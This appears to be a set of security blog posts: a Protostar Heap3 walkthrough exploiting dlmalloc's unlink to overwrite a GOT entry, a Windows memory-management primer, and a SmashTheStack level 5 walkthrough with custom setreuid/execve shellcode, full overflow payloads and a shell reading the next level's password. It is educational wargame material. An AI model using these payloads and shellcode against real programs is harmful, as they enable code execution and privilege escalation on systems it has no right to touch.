This paragraph is very important so pay attention! When a chunk is freed, if it was allocated via mmap, then it will call the munmap_chunk() function. Otherwise, it will call the chunk_free() function. Don’t worry, you only need to know how the latter works for this exercise. Within the chunk_free() function, another function, unlink(), is called if its previous chunk is free in order to take the previous chunk off its doubly linked list and coalesce it with the chunk being freed! Also note that if two free chunks are found to be contiguous to each other, the heap allocator will coalesce these two free chunks into one larger heap chunk to support defragmentation. This implies that you will never find two free contiguous chunks.

Take a look at the following important parts of the Chunk_free() and the Unlink() macro before proceeding.

Important parts of the Chunk_free() function:

  INTERNAL_SIZE_T hd = p->size;
   ...
   if (!hd & PREV_INUSE))     /* consolidate backward */    /* [A] */
   {
     prevsz = p->prev_size;
     p = chunk_at_offset(p, -(long)prevsz);                 /* [B] */
     sz += prevsz;

     if (p->fd == last_remainder(ar_ptr))
       islr = 1;
     else
       unlink(p, bck, fwd);
   }


Unlink() macro:

#define unlink( P, BK, FD ) {            \
    BK = P->bk;                          \
    FD = P->fd;                          \
    FD->bk = BK;                         \
    BK->fd = FD;                         \
}

Remember what the Unlink() macro does because it will be very important to understand when we craft our exploit!

Now let’s begin the actual exercise.

For Protostar Heap3 we are given a binary and from the exploit-exercises website we are given the following source code:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
        printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}


int main(int argc, char **argv)
{
        char *a, *b, *c;

        a = malloc(32);
        b = malloc(32);
        c = malloc(32);

        strcpy(a, argv[1]);
        strcpy(b, argv[2]);
        strcpy(c, argv[3]);

        free(c);
        free(b);
        free(a);

        printf("dynamite failed?\n");
}

The program dynamically allocates 32 bytes of memory for each buffer, string copies 3 arguments into the buffers and subsequently frees each one before calling a print statement kindly reminding us the “dynamite failed”. Nice. Instead of calling this print statement, what we want to do is redirect our thread of execution to point to the winner function so we can print out that message. Ok so how do we go about doing that?

For this specific exercise, we will be exploiting the free() function in order to build our payload. We will craft a fake chunk inside buffer B so that when buffer B is freed, it mistakenly thinks that its previous chunk is free and calls the unlink() function on it to remove the fake chunk from the doubly linked list. Why does it remove the fake chunk from the doubly linked list? Because remember, when a chunk is freed and its contiguous chunk is also free, the two chunks are coalesced into one larger free chunk.

In order to get our buffer B to think its previous chunk is our fake chunk, we must first trick it into thinking it’s previous chunk is free. Otherwise, remember, it won’t process its prev_size field if the previous chunk is allocated! We trick it into thinking the previous chunk is free by setting the lowest bit of its 4-byte size field to 0. We do this by setting it to a negative number. For this exercise let’s set buffer B’s size to -4 (0xfffffffc) because not only is its least significant bit set to 0, but we also want it to think that the size field of its contiguous chunk is 4 bytes before it in buffer B’s prev_size field instead of 32 bytes before it in buffer A’s size field. Next, we must set the prev_size field to a negative value because if you look at the Chunk_free() function again, dlmalloc calculates p by calling chunk_at_offset(p, -(long)prevsz). Basically it will traverse the inverse value of the prev_size in order to get the location the previous chunk starts at. In our case, let’s set it to -8 so that it believes the previous chunk starts at an offset of 8 bytes in front of where chunk B starts. This will be the starting location of our fake chunk, or P.

Using the unlink() function we can set P to be equal to the beginning of our fake chunk, BK to be the address of our NOP sled, and FD to be the address of the puts() function minus 12 bytes. I’ll explain why we set FD to that address shortly. Please refer to the source code for the unlink() macro above if this isn’t clear! When we craft our exploit we have to remember that the BK pointer exists at a 12 byte offset from the beginning of a chunk and that the FD pointer exists at an 8 byte offset from the beginning of the chunk. So we will need to fill in 8 bytes of filler data to reach our FD pointer. In our case let’s just use the classic hex speak 0xdeadbeef twice.

As we’ve previously seen, when corrupting the stack, generally the goal is to take control of EIP and make it point to some address it isn’t supposed to point to. The Global Offset Table (GOT) is a table of function pointers in the process address space that point to where imported functions are located. At compile time, each entry in the GOT is set to 0. However, at run time each entry points to its function’s address in the libc library. Each process has its own GOT table! We can leverage this table in our exploit by overwriting an entry in the GOT table to make its pointer point to somewhere it’s not supposed to point. In our case, as you will see, we will make it point to an address in our NOP sled so that it will go down each NOP instruction until it hits our shell code. For now, let’s take a look at our program’s GOT table.

GOT

The function we want to overwrite is puts, NOT printf. Why? Don’t we call printf in our program? Yes, but when you don’t pass in any additional arguments that begin with the modulo sign then the compiler calls puts instead of printf because it is faster and more efficient. Also, we must remember to subtract 12 bytes from the address shown in the GOT table because the Unlink() function sets FD->bk = BK and the bk field is located at a 12 byte offset from the beginning of a chunk!

0x0804b128-0xc = 0x0804b11c

So the actual address we will be using is 0x0804b11c.

What about the address of our NOP sled? How do we get that? By simply setting a breakpoint and examining the registers.

Address of Buffer A

Looks like we’ll be directing our pointer to address 0x804c008.

The shell code we will use is generated from a simple assembly program:

push 0x08048864
ret

0x08048864 is the address of the winner() function and I extracted the opcodes the same way I did in the previous exercise – by assembling the program and running objdump on the object file to extract the opcodes. This is the resulting shellcode I come up with:

\x68\x64\x88\x04\x08\xc3

Here’s a quick diagram I drew that presents a general overview of our exploit:

heap3 Diagram
Buffer A = [NOP sled] + [shellcode] + [12 filler bytes] + [modified prev_size header of Buffer B (-8)] + [modified size header of Buffer B (-4)]
Buffer B = [8 filler bytes] + [address of GOT entry – 12 bytes] + [address of NOP sled]
Buffer C = [C]

So in Buffer A we will first place our 14 byte long NOP sled followed by our 6 byte long shellcode, 12 bytes of filler data to reach the end of our first chunk, and an extra 8 bytes of data to overflow our Buffer B’s header. These extra 8 bytes will corrupt the 2nd chunk’s metadata information by changing the prev_size to -8 (0xfffffff8) and the size to -4 (0xfffffffc). This tricks dlmalloc into processing our fake chunk with unlink() allowing us to redirect the program’s flow of execution to our NOP sled and therefore our shellcode, when the print statement is called.

Here’s the complete payload we will use:

`python -c 'print “\x90”*14 + "\x68\x64\x88\x04\x08\xc3" + “A”*12 + "\xf8\xff\xff\xff" + "\xfc\xff\xff\xff”'` `python -c 'print "\xde\xad\xbe\xef"*2+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08”` C

And the result when we run it with the program:
My Heap3 Solution

Ta-da! Our first heap exploit!

An Intro to Windows Memory Management: Pt 1

So lately I have been dabbling a lot in memory corruption exploits and thought I would take this weekend off from doing wargames to write a quick post about Windows memory management before delving into challenges that require bypassing stack protection mechanisms such as NX/DEP, stack cookies/canaries and ASLR. We’ll save that for another post. 🙂

By default, 32-bit applications in Windows are allocated 4 GB of virtual address space, 2GB of which are reserved for kernel space, and the other 2 GB of which are available to the process as user space. The user space can grow to 3GB if its large address space aware flag is set and if the system is booted with 4-gigabyte tuning (4GT) enabled. Virtual address spaces are divided into “chunks” called pages and are mapped to “chunks” of physical address spaces called memory frames or page frames. Note that although the virtual pages are contiguous, the physical frames they are mapped to are discontiguous.

Pages and Frames

Each virtual page address is composed of a page number and an offset.
The most significant bits of the address specify the page number and the least significant specify the offset. Similarly, each frame address is divided into a frame number and an offset. If we were to use a home address as an analogy, you could think of the page number as the street name of the house and the offset as the address number. Pages exist in 4 states: reserved, shareable, committed or free. Committed and shareable pages are both mapped to memory frames, but the difference is shareable pages are accessible by other processes while committed pages are private and can not be accesses by other processes. In order to commit pages, Windows calls several VirtualAlloc function which reserve virtual address space before committing them at run-time.

OK, so we know what virtual pages and page frames are. But how are the virtual addresses mapped to the physical addresses? The answer is by using page tables. When we load a process into virtual memory, we need to make sure the process accesses the correct physical frames rather than the pages it thinks it is accessing inside its virtual memory abstraction. We accomplish this by using a page table which is a data structure located inside the kernel memory space in RAM that provides mappings between page numbers and frame numbers. When a process consults the page table to request an address translation, it looks up the page number in the table and swaps it with the corresponding frame number in its entry. The offset is left unchanged. The final physical address consists of the frame number and the unchanged offset.

Screen Shot 2013-11-04 at 5.20.28 PM

How is all of the above accomplished in Windows? The answer is through the Windows memory manager. Windows memory manager exists in the Windows executive inside the Windows NT Operating Systems Kernel image (ntoskrnl.exe):

Windows NT Architecture

Windows memory manager (WMM) has 3 main tasks:
1. Translating/mapping a process’s virtual address space into physical memory whenever a process reads or writes to virtual address space.
2. Paging contents of physical memory to the disk when it becomes overcommitted, or when processes require more memory than is available in the RAM.
3. Protecting processes from corrupting the address space of other processes.

In addition, Windows memory manager must be both efficient and reentrant. For the uninitiated, being reentrant entails being able to synchronize access to resources shared among different threads via some sort of mechanism such as a spin lock. Some of these resources include kernel memory pools, memory lists, page tables and ASLR structures.

One of the ways WMM maintains efficiency is by utilizing a special CPU cache known as the translation look-aside buffer (TLB). One of the problems with using page tables is that they limit the efficiency of virtual to physical address translations. Because page tables are located in RAM, each time a process requests an address translation, it actually performs 2 physical memory accesses. The first is a page table access and the second is a data access. The translation look-aside buffer addresses this issue by caching the most recently used address lookups. So instead of consulting the page table, a process consults the TLB first to see if its entry exists. If it does, it is considered a TLB hit. If it does not, it is considered a TLB miss. A typical TLB will have a hitrate of over 99% rendering it a very effective mechanism for speeding up address translation.

The WMM must also protect different process from each other so that they may not read or write to another process’s memory without the correct permissions. An example of one such case in which a process may have the correct permissions is when a parent process wants to alter the virtual memory of its child process. WMM employs several default hardware-controlled memory protection options as well as ACLs to enforce access control to shared memory objects.

Level 5 SmashTheStack Walkthrough

This level proved to be more challenging than the previous ones but it definitely taught me a lot and it felt very rewarding when I finally got the password file. It is essentially a memory corruption exercise, similar to level 3 but a bit more complicated. Again, we are given a binary and its corresponding source code. Let’s open up the source code and take a look at what we’re dealing with here.

#include
#include

int main(int argc, char **argv) {

	char buf[128];

	if(argc < 2) return 1;

	strcpy(buf, argv[1]);

	printf("%s\n", buf);

	return 0;
}

The first thing we notice is that we have another buffer declared and that the programmer was nice enough to use strcpy instead of strncpy, the latter of which requires you to specify the length of the string. Classic buffer overflow setup. Other suspect constructs to look for when code auditing for memory corruption include sprintf(), gets(), system(), strcat(), strcmp(), argv[], etc.
OK, now let’s disassemble it.

(gdb) disas main
Dump of assembler code for function main:
   0x080483b4 <+0>:	push   %ebp
   0x080483b5 <+1>:	mov    %esp,%ebp
   0x080483b7 <+3>:	sub    $0xa8,%esp
   0x080483bd <+9>:	and    $0xfffffff0,%esp
   0x080483c0 <+12>:	mov    $0x0,%eax
   0x080483c5 <+17>:	sub    %eax,%esp
   0x080483c7 <+19>:	cmpl   $0x1,0x8(%ebp)
   0x080483cb <+23>:	jg     0x80483d9 <main+37>
   0x080483cd <+25>:	movl   $0x1,-0x8c(%ebp)
   0x080483d7 <+35>:	jmp    0x8048413 <main+95>
   0x080483d9 <+37>:	mov    0xc(%ebp),%eax
   0x080483dc <+40>:	add    $0x4,%eax
   0x080483df <+43>:	mov    (%eax),%eax
   0x080483e1 <+45>:	mov    %eax,0x4(%esp)
   0x080483e5 <+49>:	lea    -0x88(%ebp),%eax
   0x080483eb <+55>:	mov    %eax,(%esp)
   0x080483ee <+58>:	call   0x80482d4 <strcpy@plt>
   0x080483f3 <+63>:	lea    -0x88(%ebp),%eax
   0x080483f9 <+69>:	mov    %eax,0x4(%esp)
   0x080483fd <+73>:	movl   $0x8048524,(%esp)
   0x08048404 <+80>:	call   0x80482b4 <printf@plt>
   0x08048409 <+85>:	movl   $0x0,-0x8c(%ebp)
   0x08048413 <+95>:	mov    -0x8c(%ebp),%eax
   0x08048419 <+101>:	leave
   0x0804841a <+102>:	ret
End of assembler dump.

After some trial and error we discover that inputting a string of length 140 breaks it.

(gdb) run `python -c 'print "A"*140'`
Starting program: /levels/level05 `python -c 'print "A"*140'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0xb7e9ee00 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6

OK. So we received a segmentation fault. What happened exactly?
Let’s take a look at the registers.

(gdb) info registers
eax            0x0	0
ecx            0xbffffb88	-1073742968
edx            0xb7fd3340	-1208143040
ebx            0xb7fd1ff4	-1208147980
esp            0xbffffc50	0xbffffc50
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0xb7e9ee00	0xb7e9ee00 <__libc_start_main+208>
eflags         0x10292	[ AF SF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99

Of course this would result in a segmentation fault because we have corrupted the saved frame pointer (EBP) and set it to an address we cannot access (0x41414141). Looking at the addresses stored in the registers we notice that they are all 4-byte dwords. I bet if we input a 144 byte long string it will completely overwrite the return address stored in the instruction pointer.

(gdb) b *main+63
Breakpoint 2 at 0x804841a
(gdb) run `python -c 'print "A"*144'`
Starting program: /levels/level05 `python -c 'print "A"*144'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/2x $ebp
0x41414141:	Cannot access memory at address 0x41414141

Yup. Just as we suspected. The program tries to jump to address 0x41414141 which likely doesn’t even exist.
So the distance between the start of the buffer and the start of the saved return address is 140 bytes.
But how does that help us?
It seems now that we must overwrite the return address (EIP) so that instead of pointing to the RET instruction at the end, it points to our NOP sled somewhere leading to some malicious shellcode we want to execute. In order to achieve this, we must create our own payload.
The formula for this payload will be as follows:

Level 5 Payload = NOP sled + Shellcode + New Return Address

Here is a crudely put together diagram I made quickly to help us visualize a little better:
<———lower memory addresses                                                                                      higher memory addresses——–>
[——————————————–NOP sled——————————————–][———–shellcode——-[old SFP]][new RA]

Keep this formula in mind as we continue!
For this walkthrough let’s split this up into 3 steps:
1) Generate the shellcode + determine its length
2) Determine the length of the NOP sled
3) Determine the addresses occupied by the NOP sled when EIP points to the return address

Let’s follow these steps  in order. So first let’s generate the shellcode we will use for our payload and find out its length.

1) Of course, we could just copy someone’s shellcode off an online repository like exploit-db or automate the process using metasploit, but for the purposes of this exercise I generated my own shellcode to learn the process and methodology behind it.
Before we begin, let’s keep in mind shellcode should be:
1. small enough to fit within the distance between the start of the retn addr and the start of the buffer
2. position independent (should not reference any absolute addresses)
3. not contain any NULL characters

In order to generate shellcode, we will first write the program in assembly, compile it, then extract the opcodes from the resulting object file.
This is the ASM program I came up with (please note my comments in the code):

  1 ;shellcode to change permissions and spawn shell
  2 section .text
  3
  4 global _start
  5
  6 _start:
  7 ;setreuid (uid_t ruid, uid_t euid)
  8 xor eax, eax ;clear eax register
  9 xor ebx, ebx ;clear ebx register
 10 xor ecx, ecx ;clear ecx register
 11 xor edx, edx ;clear edx register
 12 mov al, 70 ;set syscall number to 70 (setreuid)
 13 mov bx, 1006 ;set uid to 1006
 14 mov cx, 1006 ;set euid to 1006
 15 int 0x80 ;execute syscall
 16
 17 ;clears out registers
 18 xor eax, eax
 19 xor ebx, ebx
 20 xor ecx, ecx
 21 xor edx, edx
 22
 23 ;execve (const char *filename, char *const argv [], char *const envp[])
 24 mov al, 11 ;set syscall number to 11 (execve)
 25 jmp str_loc ;jump to str_loc
 26 str_loc_ret:
 27   pop ebx ;pop return addr to ebx register
 28   mov [ebx+7],cl ;null terminate string
 29   int 0x80 ;execute syscall
 30
 31 str_loc:
 32   call str_loc_ret ;call str_loc_ret
 33   db '/bin/shN' ;/bin/sh strn + N placeholder

We invoke the system call execve, passing in the argument /bin/sh in order to spawn the shell.
We also invoke system call setreuid to elevate our privileges so that we can cat the level 6 password file.
After each system call, we trigger a 0x80 interrupt in order to make the CPU enter kernel mode and process our request.

Because our shellcode must rely on relative addressing rather than use hardcoded addresses, we jump to the str_loc function which immediately calls the str_loc_ret function, thus setting the return address to the address of “/bin/shN” and pushing it onto the top of the stack since it is the next instruction that is supposed to be executed when the function returns. It will serve as our base address for the remainder of this program and now any absolute address is referenced as an offset of this base address. db is an 8 bit define byte which sets aside space in memory for a string. You can think of it as a global variable.

Once we have made this program, we must now extract the opcodes in order to put together our shellcode.

level5@io:/tmp/conceptofproof$ nasm -f elf level5shellcode.asm
level5@io:/tmp/conceptofproof$ objdump -d level5shellcode.o

level5shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000 <_start>:
   0:	31 c0                	xor    %eax,%eax
   2:	31 db                	xor    %ebx,%ebx
   4:	31 c9                	xor    %ecx,%ecx
   6:	31 d2                	xor    %edx,%edx
   8:	b0 46                	mov    $0x46,%al
   a:	66 bb ee 03          	mov    $0x3ee,%bx
   e:	66 b9 ee 03          	mov    $0x3ee,%cx
  12:	cd 80                	int    $0x80
  14:	31 c0                	xor    %eax,%eax
  16:	31 db                	xor    %ebx,%ebx
  18:	31 c9                	xor    %ecx,%ecx
  1a:	31 d2                	xor    %edx,%edx
  1c:	b0 0b                	mov    $0xb,%al
  1e:	eb 06                	jmp    26 <str_loc>

00000020 <str_loc_ret>:
  20:	5b                   	pop    %ebx
  21:	88 4b 07             	mov    %cl,0x7(%ebx)
  24:	cd 80                	int    $0x80

00000026 <str_loc>:
  26:	e8 f5 ff ff ff       	call   20 <str_loc_ret>
  2b:	2f                   	das
  2c:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  2f:	2f                   	das
  30:	73 68                	jae    9a <str_loc+0x74>
  32:	4e                   	dec    %esi

Thus, this is the shellcode we will use:

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x66\xbb\xee\x03\x66\xb9\xee\x03\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x0b\xeb\x06\x5b\x88\x4b\x07\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e

1 byte = 2 hex digits so this shellcode is 51 bytes long.

2) Now we must figure out how long our NOP sled has to be in order to make this exploit work. We have to make it just long enough that it doesn’t overwrite the return address in our payload. How do we determine this length? We actually already found this earlier when we first broke the program. Remember: the distance between the start of the buffer and the start of the saved return address is 140 bytes.

length of NOP sled + length of shellcode = 140 bytes
length of NOP sled = 140 bytes – length of shell code
length of NOP sled = 140 bytes – 51 bytes = 89 bytes, so our NOP sled must be 89 bytes long to fill the rest of the buffer space.

3) Now to complete our payload we have to figure out where the buffer starts.

(gdb) run `python -c 'print "\x90"*200'`
Starting program: /levels/level05 `python -c 'print "\x90"*200'`
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

(gdb) x/200x $esp
0xbffffc20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc50:	0x90909090	0x90909090	0x00000000	0x00000000
0xbffffc60:	0xbffffc98	0xaf338d69	0x83107b79	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000002	0x080482f0
0xbffffc80:	0x00000000	0xb7ff59c0	0xb7e9ed3b	0xb7ffeff4
0xbffffc90:	0x00000002	0x080482f0	0x00000000	0x08048311
0xbffffca0:	0x080483b4	0x00000002	0xbffffcc4	0x08048470
0xbffffcb0:	0x08048420	0xb7ff0590	0xbffffcbc	0xb7fff908
0xbffffcc0:	0x00000002	0xbffffdc5	0xbffffdd5	0x00000000
0xbffffcd0:	0xbffffe9e	0xbffffeae	0xbffffeb9	0xbffffeda
0xbffffce0:	0xbffffeed	0xbffffef9	0xbfffff05	0xbfffff43
0xbffffcf0:	0xbfffff59	0xbfffff68	0xbfffff74	0xbfffff85
0xbffffd00:	0xbfffff8e	0xbfffffa0	0xbfffffa8	0xbfffffb7
0xbffffd10:	0x00000000	0x00000010	0xbfebfbff	0x00000006
0xbffffd20:	0x00001000	0x00000011	0x00000064	0x00000003
0xbffffd30:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffd40:	0x00000007	0x00000007	0xb7fe2000	0x00000008
0xbffffd50:	0x00000000	0x00000009	0x080482f0	0x0000000b
0xbffffd60:	0x000003ed	0x0000000c	0x000003ed	0x0000000d
0xbffffd70:	0x000003ed	0x0000000e	0x000003ed	0x00000017
0xbffffd80:	0x00000000	0x00000019	0xbffffdab	0x0000001f
0xbffffd90:	0xbfffffe8	0x0000000f	0xbffffdbb	0x00000000
0xbffffda0:	0x00000000	0x00000000	0x03000000	0xe657e9ed
0xbffffdb0:	0x2a0b2865	0xc308ccaf	0x69d6b786	0x00363836
0xbffffdc0:	0x00000000	0x656c2f00	0x736c6576	0x76656c2f
0xbffffdd0:	0x35306c65	0x90909000	0x90909090	0x90909090
0xbffffde0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffdf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffe80:	0x90909090	0x90909090	0x90909090	0x90909090
---Type  to continue, or q  to quit---
0xbffffe90:	0x90909090	0x90909090	0x90909090	0x48530090

We can see here our NOP sled starts at 0xbffffdd4 and ends at 0xbffffe9C.
We can set our return address to be anywhere inside the NOP sled so let’s just pick 0xbffffe40.
Accounting for endianess, we denote this address as \x40\xfe\xff\xbf.

When we combine everything together, this is the result:

`python -c 'print "\x90"*89+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x66\xbb\xee\x03\x66\xb9\xee\x03\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x0b\xeb\x06\x5b\x88\x4b\x07\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"+"\x40\xfe\xff\xbf"'`

Finally! Time to test out our payload!

level5@io:/levels$ ./level05 `python -c 'print "\x90"*89+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x66\xbb\xee\x03\x66\xb9\xee\x03\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x0b\xeb\x06\x5b\x88\x4b\x07\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"+"\x40\xfe\xff\xbf"'`
�����������������������������������������������������������������������������������������1��F1�f��1�f��1�̀1�1�1�1Ұ
                                                                                                                   �[�K̀�����/bin/shN@���
level6@io:/levels$ id
uid=1006(level6) gid=1005(level5) groups=1006(level6),1005(level5),1029(nosu)
level6@io:/levels$ cat /home/level6/.pass
l1tbXUH2Q/Eotw

And there we have it! Sweet.

-JW